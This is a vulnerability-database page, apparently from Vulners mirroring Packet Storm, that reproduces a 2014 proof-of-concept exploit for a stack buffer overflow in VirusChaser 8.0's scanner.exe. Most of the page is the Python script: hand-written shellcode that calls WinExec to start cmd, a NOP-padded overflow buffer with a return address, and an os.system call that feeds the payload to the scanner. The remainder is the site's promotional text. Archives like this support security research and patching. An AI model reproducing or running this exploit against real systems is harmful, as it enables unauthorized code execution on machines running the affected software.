Lucene search
K

VirusChaser 8.0 Buffer Overflow

🗓️ 26 Mar 2014 00:00:00Reported by wh1antType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

VirusChaser 8.0 Stack Buffer Overflow Exploi

Code
`# Exploit Title: VirusChaser 8.0 - Stack Buffer Overflow  
# Date: 2014/03/26  
# Exploit Author: wh1ant  
# Vendor Homepage: https://www.viruschaser.com/  
# Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip  
# Version: 8.0  
# Tested on: Windows 7 ultimate K  
#  
# You must have administrator permission to run  
  
from struct import pack  
import os  
  
shellcode = "\x66\x83\xc4\x10" # add esp, 0x10  
shellcode += "\xb8\x50\x70\x50\x50" # mov eax, 0x50507050  
shellcode += "\xb9\x4e\x7d\x04\x27" # mov ecx, 0x27047d4e  
shellcode += "\x03\xc1" # add eax, ecx ; WinExec() address  
shellcode += "\x68\x63\x6d\x64\x01" # push 0x01646D63  
shellcode += "\x66\xb9\x50\x50" # add cx, 0x5050  
shellcode += "\x66\x81\xc1\xb0\xaf" # add cx, 0xafb0  
shellcode += "\x88\x4c\x24\x03" # mov [esp+3], cl  
shellcode += "\x8b\xd4" # mov edx, esp  
shellcode += "\x66\x51" # push cx  
shellcode += "\x41" # inc cx  
shellcode += "\x66\x51" # push cx  
shellcode += "\x52" # push edx  
shellcode += "\x50" # push eax  
shellcode += "\x50" # push eax  
shellcode += "\xc3\x90" # retn ; WinExec()  
  
# BOF retn: 0x0040753d  
  
pay = shellcode  
pay = pay.rjust(520, "\x90")  
pay += "\x9c\xdb\x12"  
  
os.system("C:\\\"Program Files\\VirusChaser\\scanner.exe\" \"" + pay + "\"")  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Mar 2014 00:00Current
0.9Low risk
Vulners AI Score0.9
16